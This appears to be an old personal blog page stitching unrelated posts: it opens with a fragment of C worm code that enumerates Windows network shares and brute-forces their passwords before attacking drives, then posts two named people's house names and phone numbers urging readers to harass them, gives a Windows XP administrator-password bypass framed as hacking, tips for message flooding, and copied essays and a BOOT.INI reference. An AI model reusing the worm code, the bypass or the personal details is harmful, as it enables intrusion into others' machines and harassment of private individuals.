if( RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) )

{

propogateNet( &lpnrLocal[i] );

} else if( RESOURCETYPE_DISK == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) )

{

if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD )

{

// try all found password/username combinations...

printf("ERROR_INVALID_PASSWORD "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );

if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 )

{

attackDrive( lpnrLocal[i].lpRemoteName, 0 );

WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);

}

} else {

attackDrive( lpnrLocal[i].lpRemoteName, 0 );

WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);

printf("ACCESS NOT DENIED "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );

}

}

}

} else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) {

break;

}

} while( dwResultEnum != ERROR_NO_MORE_ITEMS );

GlobalFree( (HGLOBAL) lpnrLocal );

WNetCloseEnum( hEnum );

return;

}

//----------------------------------------------------------------------------//

int crackNetShare( char * share )

{

int retval = 0;

for( int i=0 ; i

{

retval = WNetAddConnection( share , passwordList[i], NULL );

if( retval == NO_ERROR && retval != ERROR_INVALID_PASSWORD ) // <----- !!! dodgy testing, fix it

{

printf("PASS CRACKED: %s : %s\n", share , passwordList[i]);

return 0;

}

}

return -1;

}

//----------------------------------------------------------------------------//

void releasePayload()

{

printf("\n\t!!! PAYLOAD !!!\n");

return;

}

//----------------------------------------------------------------------------//

HAPPY WORM CREATING hehehe,.......do it for ur own risk ok...........

PICTURE OF THE DHIRAAGU WEB SERVER DEFACE

To while a go was looking my old data to clean and dump some out i have taken this picture from my friend chopey.......blog that was very long time post .... hey part no offen when i post it ...ok

MY TUNES (dhiraagu)

here is a testing service that dhiraagu gives puting songe in the dail tones if u want to do that setup dial to 155 from ur mobile but remeber they charge for the call................

DISTURBANCE CALLS

this bugger was disturbuing me and for my girl friend for a while here is the numbers details.....

Ahmed Naeem Ibrahim ,Weet House , 7897295

Mohamed Mukthar ,Irudheymaage , 7895098

i just tryed to search them throught they house name but dhiraagu have remove that feature......
that is shit if they can control the mobile freaks they must give these rights coustomers...........
hey all my blog readers plez call these two bugger and piss them offf i have bitter there mouth once u could give a try

with my heart

now im with my girl friend

HOW TO BREAK IN THE WINDOWZ ADMIN

These questions are very

I Forgot My Administrator Password!

I LOST IT My Administrator Password!

How to hack win xp? or I got a comp that I don’t know the password?

So never ask me again??? Here is it?

Can't Log On to Windows XP?

If that’s your only problem, then you probably have nothing to worry about. As long as you have your Windows XP CD, you can get back into your system using a simple but effective method made possible by a little known access hole in Windows XP.

ERD is an excellent multi purpose product, but you should know it is not a necessary one if you have a healthy system and your sole problem is the inability to logon to Windows due to a forgotten password. Not necessary because you can easily change or wipe out your Administrator password for free during a Windows XP Repair. Here’s how with a step-by-step description of the initial Repair process included for newbie’s.

1. Place your Windows XP CD in your cd-rom and start your computer (it’s assumed here that your XP CD is bootable – as it should be - and that you have your bios set to boot from CD)

2. Keep your eye on the screen messages for booting to your cd Typically, it will be “Press any key to boot from cd”

3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.

4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now

5. The Licensing Agreement comes next - Press F8 to accept it.

6. The next screen is the Setup screen which gives you the option to do a Repair.

It should read something like “If one of the following Windows XP installations is damaged, Setup can try to repair it”

Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.

7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.

8. Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically – you will see a progress bar stating “Your computer will reboot in 15 seconds”

9. During the reboot, do not make the mistake of “pressing any key” to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.

10. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

11. At the prompt, type NUSRMGR.CPL , COMPMGMT.MSC and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.

12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).

13. Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.

I tested the above on Windows XP Pro with and without SP1 and also used this method in a real situation where someone could not remember their password and it worked like a charm to fix the problem. This security hole allows access to more than just user accounts. You can also access the Registry and Policy Editor, for example. And its gui access with mouse control. Of course, a Product Key will be needed to continue with the Repair after making the changes, but for anyone intent on gaining access to your system, this would be no problem.

And in case you are wondering, NO, you cannot cancel install after making the changes and expect to logon with your new password.

Canceling will just result in Setup resuming at boot up and your changes will be lost.

Ok, now that your logon problem is fixed, you should make a point to prevent it from ever happening again by creating a Password Reset Disk. This is a floppy disk you can use in the event you ever forget your log on password. It allows you to set a new password.

Here's how to create one if your computer is NOT on a domain:

• Go to the Control Panel and open up User Accounts.
• Choose your account (under Pick An Account to Change) and under Related Tasks, click "Prevent a forgotten password".
• This will initiate a wizard.
• Click Next and then insert a blank formatted floppy disk into your A: drive.
• Click Next and enter your logon password in the password box.
• Click Next to begin the creation of your Password disk.
• Once completed, label and save the disk to a safe place

How to Log on to your PC Using Your Password Reset Disk

Start your computer and at the logon screen, click your user name and leave the password box blank or just type in anything. This will bring up a Logon Failure box and you will then see the option to use your Password Reset disk to create a new password. Click it which will initiate the Password Reset wizard. Insert your password reset disk into your floppy drive and follow the wizard which will let you choose a new password to use for your account.

Note: If your computer is part of a domain, the procedure for creating a password disk is different. plez google it for more information………….u will come across many tools & utilities……….search it…… work it out ….think it…… exploit it ………. feel the codes…. dream it……..

Virtual Communities aren't supposed to be physically real

This one thing that i came across very interesting ...read it enjoy it...

Virtual Communities aren't supposed to be physically real

Throughout this unit I have noticed a common theme, in that people seem to be linking the concept of "community" with a need for physical reality. There is no such need. Thousands of communities existed even before the Internet where there was no actual physical meeting place for the participants - they simply shared a common interest.

Sure, in Counter-Strike you aren't fighting in a real army and in World of Warcraft you aren't in a real place - We are all well aware of this, that doesn't lessen the groups that make up these online games as a community as long as they conform to a dictionary definition. The group of people who share the common interest of playing paintball aren't in a real army either, but that doesn't make their shared experience and community any less real - just different.

An interacting population of various kinds of individuals in a common location.

or

a body of persons of common interests scattered through a larger society (such as the academic community).

This is by no means an exhaustive list of definitions, but they are, I feel, the most important ones when considering this topic.

Can you argue that the population of an MMORPG such as World of Warcraft is not interacting in a common location? Sure, it isn't a physical location but it still is a location. When people ask you "Hey where did you find that information?" you say "On the Internet", you don't say "It came from this fake place that doesn't exist". Despite the lack of physicallity it is still a location.

Secondly, a common interest is obviously shared in online games.

Thirdly, even if the Internet disappeared tomorrow for a week and there was no game servers to log onto there would still be a "World of Warcraft Community": Individuals scattered throughout the wider community who play the game. Even communities from players for individual servers.

I'll finish off with an example from my own gaming experience last night.

I was on the World of Warcraft server I play on in the city of Ironforge. This is the place where most members of the Alliance races go when looking for a group to adventure with since it has the most convenient services all gathered together. It is sort of a hub for all things Alliance.

Anyway, I saw someone advertising that they needed more people for a "raid" on a place called "Stratholme", it is a very dangerous area full of powerful enemies.

I said to them "If you need a hunter I will go with you" and I was quickly invited to join.

Once I was in the party there was some discussion about what other sorts of players we needed. Some said we needed another warrior, some wanted a mage or a warlock for spells. A few names of players interested in coming were put to the group, some of whom one or more of the various members objected to - "No, don't take Apok, he is too low level", "No, Don't take Mythrandir, he is a Ninja looter" (a ninja looter is someone who quickly snatches up loot which is useless for a character of his own class and simply wants to sell it for gold when another group member would have really liked to use it).

Eventually we got a party together that everyone was satisfied with, we all headed off to the area, where we planned our assault, laid down the law for the rules about the distribution of any loot and headed in.

A couple of hours later our raid was over. A few of the other members complimented me on my skill as a Hunter and we exchanged some negative words about 2 or 3 of the 10 members of the group who hadn't proven very good team-players and would likely find themselves excluded from future ventures.

.....

Now, yes I know none of that is physically real, but can anyone argue that a group of people are having experiences and interacting? Can anyone argue against the idea that there is a common interest?

You don't have to believe that Stratholme, Ironforge, or Night-Elf Hunters really exist in the physical world to accept that a group of people are interacting here.

It is the interaction that is important, not the physical existence of the meeting place.

I would have thought that since this unit is called "virtual communities" that is the whole point.

source http://teamscarlet.blogspot.com/

The NET SEND command may not work correctly on a computer that is running Windows XP Service Pack 2

WHEN U TRY TO SEND A NETSEND COMMAND IT WILL GIVEA ERROR SAYING

An error occurred while sending a message to .
The message alias could not be found on the network.
More help is available by typing NET HELPMSG 2273.

CAUSE

The NET SEND command uses the Messenger service to send messages on the network. This problem occurs because the Messenger service is disabled. By default, the Messenger service is disabled on computers that are running Microsoft Windows XP SP2.

WORKAROUND

To work around this problem, change the Startup type of the Messenger service to Automatic, and then start the Messenger service. To do this, follow these steps:

1.	Open Windows Explorer.
2.	In the left pane, right-click My Computer, and then click Manage.
3.	In the Computer Management window, expand Services and Applications in the left pane, and then click Services.
4.	In the right pane, double-click Messenger.
5.	In the Messenger Properties (Local Computer) dialog box, click the General tab.
6.	On the General tab, select Automatic from the Startup type list, and then click Apply.
7.	Under Service status, click Start, and then click OK.

THIS IS WHAT I HAVE DONE NOW IT WORKS FINE
.............HAPPY MSG FLOODINGS........

Boot INI Options Reference

WHEN I WAS SEARCHING IN THE INTERNET TO CHANGE MY BOOT SCREEN AND LOGING SCREEN I CAME ACROSS THIS INFORMATIO THAT IS VERY HANDY TO ME ...........

There are number of BOOT.INI switches that are useful for driver developers that wish to test their drivers under a variety of different system configurations without having to have a separate machine for every one. For example, limiting the amount of memory NT sees can be useful for stressing memory loads, and limiting the number of processors for testing scalability. I've compiled a complete list of the options that BOOT.INI currently supports. This list is reproduced in the Startup, Shutdown and Crashes chapter of Windows Internals, where you'll find more information about the boot process. Entries in red were introduced in Windows 2000 and those in blue introduced in Windows XP or Windows Server 2003.

Note: to see what options I system has booted with examine HKLMSystemCurrentControlSetControlSystemStartOptions.

/3GB

Increases the size of the user process address space from 2 GB to 3 GB (and therefore reduces the size of system space from 2 GB to 1 GB). Giving virtual-memory- intensive applications such as database servers a larger address space can improve their performance. For an application to take advantage of this feature, however, two additional conditions must be met: the system must be running Windows XP, Windows Server 2003, Windows NT 4 Enterprise Edition, Windows 2000 Advanced Server or Datacenter Server and the application .exe must be flagged as a 3-GB-aware application. Applies to 32-bit systems only.

/BASEVIDEO

Causes Windows to use the standard VGA display driver for GUI-mode operations.

/BAUDRATE=

Enables kernel-mode debugging and specifies an override for the default baud rate (19200) at which a remote kernel debugger host will connect. Example: /BAUDRATE=115200.

/BOOTLOG

Causes Windows to write a log of the boot to the file %SystemRoot%Ntbtlog.txt.

/BOOTLOGO

Use this switch to have Windows XP or Windows Server 2003 display an installable splash screen instead of the standard splash screen. First, create a 16-color (any 16 colors) 640x480 bitmap and save it in the Windows directory with the name Boot.bmp. Then add "/bootlogo /noguiboot" to the boot.ini selection.

/BREAK

Causes the hardware abstraction layer (HAL) to stop at a breakpoint at HAL initialization. The first thing the Windows kernel does when it initializes is to initialize the HAL, so this breakpoint is the earliest one possible. The HAL will wait indefinitely at the breakpoint until a kernel-debugger connection is made. If the switch is used without the /DEBUG switch, the system will Blue Screen with a STOP code of 0x00000078 (PHASE0_ EXCEPTION).

/BURNMEMORY=

Specifies an amount of memory Windows can't use (similar to the /MAXMEM switch). The value is specified in megabytes. Example: /BURNMEMORY=128 would indicate that Windows can't use 128 MB of the total physical memory on the machine.

/CHANNEL=

Used on conjunction with /DEBUGPORT=1394 to specify the IEEE 1394 channel through which kernel debugging communications will flow. This can be any number between 0 and 62 and defaults to 0 if not set.

/CLKLVL

Causes the standard x86 multiprocessor HAL (Halmps.dll) to configure itself for a level-sensitive system clock rather then an edge-triggered clock. Level-sensitive and edge-triggered are terms used to describe hardware interrupt types.

/CMDCONS

Passed when booting with into the Recovery Console (described later in this chapter).

/CRASHDEBUG

Causes the kernel debugger to be loaded when the system boots, but to remain inactive unless a crash occurs. This allows the serial port that the kernel debugger would use to be available for use by the system until the system crashes (vs. /DEBUG, which causes the kernel debugger to use the serial port for the life of the system session).

/DEBUG

Enables kernel-mode debugging.

/DEBUGPORT=

Enables kernel-mode debugging and specifies an override for the default serial (usually COM2 on systems with at least two serial ports) to which a remote kernel-debugger host is connected. Windows XP and Windows Server 2003 also support debugging through accept IEEE 1394 ports. Examples: /DEBUGPORT=COM2, /DEBUGPORT=1394.

/EXECUTE

This option disables no-execute protection. See the /NOEXECUTE switch for more information.

/FASTDETECT

Default boot option for Windows. Replaces the Windows NT 4 switch /NOSERIALMICE. The reason the qualifier exists (vs. just having NTDETECT perform this operation by default) is so that NTDETECT can support booting Windows NT 4. Windows Plug and Play device drivers perform detection of parallel and serial devices, but Windows NT 4 expects NTDETECT to perform the detection. Thus, specifying /FASTDETECT causes NTDETECT to skip parallel and serial device enumeration (actions that are not required when booting Windows), whereas omitting the switch causes NTDETECT to perform this enumeration (which is required for booting Windows NT 4).

/INTAFFINITY

Directs the standard x86 multiprocessor HAL (Halmps.dll) to set interrupt affinities such that only the highest numbered processor will receive interrupts. Without the switch, the HAL defaults to its normal behavior of letting all processors receive interrupts.

/KERNEL=
/HAL=

Enable you to override Ntldr's default filename for the kernel image (Ntoskrnl.exe) and/or the HAL (Hal.dll). These options are useful for alternating between a checked kernel environment and a free (retail) kernel environment or even to manually select a different HAL. If you want to boot a checked environment that consists solely of the checked kernel and HAL, which is typically all that is needed to test drivers, follow these steps on a system installed with the free build:

· Copy the checked versions of the kernel images from the checked build CD to your WindowsSystem32 directory, giving the images different names than the default. For example, if you're on a uniprocessor, copy Ntoskrnl.exe to Ntoschk.exe and Ntkrnlpa.exe to Ntoschkpa.exe. If you're on a multiprocessor, copy Ntkrnlmp.exe to Ntoschk.exe and Ntkrpamp.exe to Ntoschkpa.exe. The kernel filename must be an 8.3-style short name.

· Copy the checked version of the appropriate HAL needed for your system from I386Driver.cab on the checked build CD to your WindowsSystem32 directory, naming it Halchk.dll. To determine which HAL to copy, open WindowsRepairSetup.log and search for Hal.dll; you'll find a line like WINDOWSsystem32 hal.dll="halacpi.dll","1d8a1". The name immediately to the right of the equals sign is the name of the HAL you should copy. The HAL filename must be an 8.3-style short name.

· Make a copy of the default line in the system's Boot.ini file.

· In the string description of the boot selection, add something that indicates that the new selection will be for a checked build environment (for example, “Windows XP Professional Checked”).

· Add the following to the end of the new selection's line: /KERNEL=NTOSCHK.EXE /HAL= HALCHK.DLL

Now when the selection menu appears during the boot process you can select the new entry to boot a checked environment or select the entry you were using to boot the free build.

/LASTKNOWNGOOD

Causes the system to boot as if the LastKnownGood boot option was selected.

/MAXMEM=

Limits Windows to ignore (not use) physical memory beyond the amount indicated. The number is interpreted in megabytes. Example: /MAXMEM=32 would limit the system to using the first 32 MB of physical memory even if more were present.

/MAXPROCSPERCLUSTER=

For the standard x86 multiprocessor HAL (Halmps.dll), forces cluster-mode Advanced Programmable Interrupt Controller (APIC) addressing (not supported on systems with an 82489DX external APIC interrupt controller).

/MININT

This option is used by Windows PE (Preinstallation Environment) and causes the Configuration Manager to load the Registry SYSTEM hive as a volatile hive such that changes made to it in memory are not saved back to the hive image.

/NODEBUG

Prevents kernel-mode debugging from being initialized. Overrides the specification of any of the three debug-related switches, /DEBUG, /DEBUGPORT, and /BAUDRATE.

/NOEXECUTE

This option is only available on 32-bit versions of Windows when running on processors supporting no-execute protection. It enables no-execute protection (also known as Data Execution Protection - DEP), which results in the Memory Manager marking pages containing data as no-execute so that they cannot be executed as code. This can be useful for preventing malicious code from exploiting buffer overflow bugs with unexpected program input in order to execute arbitrary code. No-execute protection is always enabled on 64-bit versions of Windows on processors that support no-execute protection. There are several options you can specify with this switch:

· /NOEXECUTE=OPTIN Enables DEP for core system images and those specified in the DEP configuration dialog.

· /NOEXECUTE=OPTOUT Enables DEP for all images except those specified in the DEP configuration dialog.

· /NOEXECUTE=ALWAYSON Enables DEP on all images.

· /NOEXECUTE=ALWAYSOFF Disables DEP.

/NOGUIBOOT

Instructs Windows not to initialize the VGA video driver responsible for presenting bitmapped graphics during the boot process. The driver is used to display boot progress information, so disabling it will disable the ability of Windows to show this information.

/NOLOWMEM

Requires that the /PAE switch be present and that the system have more than 4 GB of physical memory. If these conditions are met, the PAE-enabled version of the Windows kernel, Ntkrnlpa.exe, won't use the first 4 GB of physical memory. Instead, it will load all applications and device drivers, and allocate all memory pools, from above that boundary. This switch is useful only to test device driver compatibility with large memory systems.

/NOPAE

Forces Ntldr to load the non-Physical Address Extension (PAE) version of the Windows kernel, even if the system is detected as supporting x86 PAEs and has more than 4 GB of physical memory.

/NOSERIALMICE=[COMx | COMx,y,z...]

Obsolete Windows NT 4 qualifier—replaced by the absence of the /FASTDETECT switch. Disables serial mouse detection of the specified COM ports. This switch was used if you had a device other than a mouse attached to a serial port during the startup sequence. Using /NOSERIALMICE without specifying a COM port disables serial mouse detection on all COM ports. See Microsoft Knowledge Base article Q131976 for more information.

/NUMPROC=

Specifies the number of CPUs that can be used on a multiprocessor system. Example: /NUMPROC=2 on a four-way system will prevent Windows from using two of the four processors.

/ONECPU

Causes Windows to use only one CPU on a multiprocessor system.

/PAE

Causes Ntldr to load Ntkrnlpa.exe, which is the version of the x86 kernel that is able to take advantage of x86 PAEs. The PAE version of the kernel presents 64-bit physical addresses to device drivers, so this switch is helpful for testing device driver support for large memory systems.

/PCILOCK

Stops Windows from dynamically assigning IO/IRQ resources to PCI devices and leaves the devices configured by the BIOS. See Microsoft Knowledge Base article Q148501 for more information.

/RDPATH=

Specifies the path to a System Disk Image (SDI) file, which can be on the network, that the system will use to boot from. Often used in conjunction with the /RDIMAGEOFFSET= flag to indicate to NTLDR where in the file the system image starts.

/REDIRECT

Introduced with Windows XP. Used to cause Windows to enable Emergency Management Services (EMS) that reports boot information and accepts system management commands through a serial port. Specify serial port and baudrate used in conjunction with EMS with redirect= and redirectbaudrate= lines in the [boot loader] section of the Boot.ini file.

/SAFEBOOT:

Specifies options for a safe boot. You should never have to specify this option manually, since Ntldr specifies it for you when you use the F8 menu to perform a safe boot. (A safe boot is a boot in which Windows only loads drivers and services that are specified by name or group under the Minimal or Network registry keys under HKLMSYSTEMCurrentControlSetControlSafeBoot.) Following the colon in the option you must specify one of three additional switches: MINIMAL, NETWORK, or DSREPAIR. The MINIMAL and NETWORK flags correspond to safe boot with no network and safe boot with network support, respectively. The DSREPAIR (Directory Services Repair) switch causes Windows to boot into a mode in which it restores the Active Directory directory service from a backup medium you present. An additional option you can append is (ALTERNATESHELL), which tells Windows to use the program specified by the HKLMSYSTEMCurrentControlSet SafeBootAlternateShell value as the graphical shell rather than to use the default, which is Windows Explorer.

/SCSIORDINAL:

Directs Windows to the SCSI ID of the controller. (Adding a new SCSI device to a system with an on-board SCSI controller can cause the controller's SCSI ID to change.) See Microsoft Knowledge Base article Q103625 for more information.

/SDIBOOT=

Used in Windows XP Embedded systems to have Windows boot from a RAM disk image stored in the specified System Disk Image (SDI) file.

/SOS

Causes Windows to list the device drivers marked to load at boot time and then to display the system version number (including the build number), amount of physical memory, and number of processors.

/TIMERES=

Sets the resolution of the system timer on the standard x86 multiprocessor HAL (Halmps.dll). The argument is a number interpreted in hundreds of nanoseconds, but the rate is set to the closest resolution the HAL supports that isn't larger than the one requested. The HAL supports the following resolutions:

Hundreds of nanoseconds Milliseconds (ms)
9766 0.98
19532 2.00
39063 3.90
78125 7.80

The default resolution is 7.8 ms. The system timer resolution affects the resolution of waitable timers. Example: /TIMERES=21000 would set the timer to a resolution of 2.0 ms.

/USERVA=

This switch is only supported on Windows XP and Windows Server 2003. Like the /3GB switch, this switch gives applications a larger address space. Specify the amount in MB between 2048 and 3072. This switch has the same application requirements as the /3GB switch and requires that the /3GB switch be present. Applies to 32-bit systems only.

/WIN95

Directs Ntldr to boot the Consumer Windows boot sector stored in Bootsect.w40. This switch is pertinent only on a triple-boot system that has MS-DOS, Consumer Windows, and Windows installed. See Microsoft Knowledge Base article Q157992 for more information.

/WIN95DOS

Directs Ntldr to boot the MS-DOS boot sector stored in Bootsect.dos. This switch is pertinent only on a triple-boot system that has MS-DOS, Consumer Windows, and Windows installed. See Microsoft Knowledge Base article Q157992 for more information.

/YEAR=

Instructs the Windows core time function to ignore the year that the computer's real-time clock reports and instead use the one indicated. Thus, the year used in the switch affects every piece of software on the system, including the Windows kernel. Example: /YEAR=2001. (This switch was created to assist in Y2K testing.)

Thanks to Jonas Fischer for pointing out the PCILOCK and NOSERIALMICE switches. Thanks to Rob Green for information on the FASTDETECT switch.

Copyright © 1996-2004 Mark Russinovich from www.sysinternals.com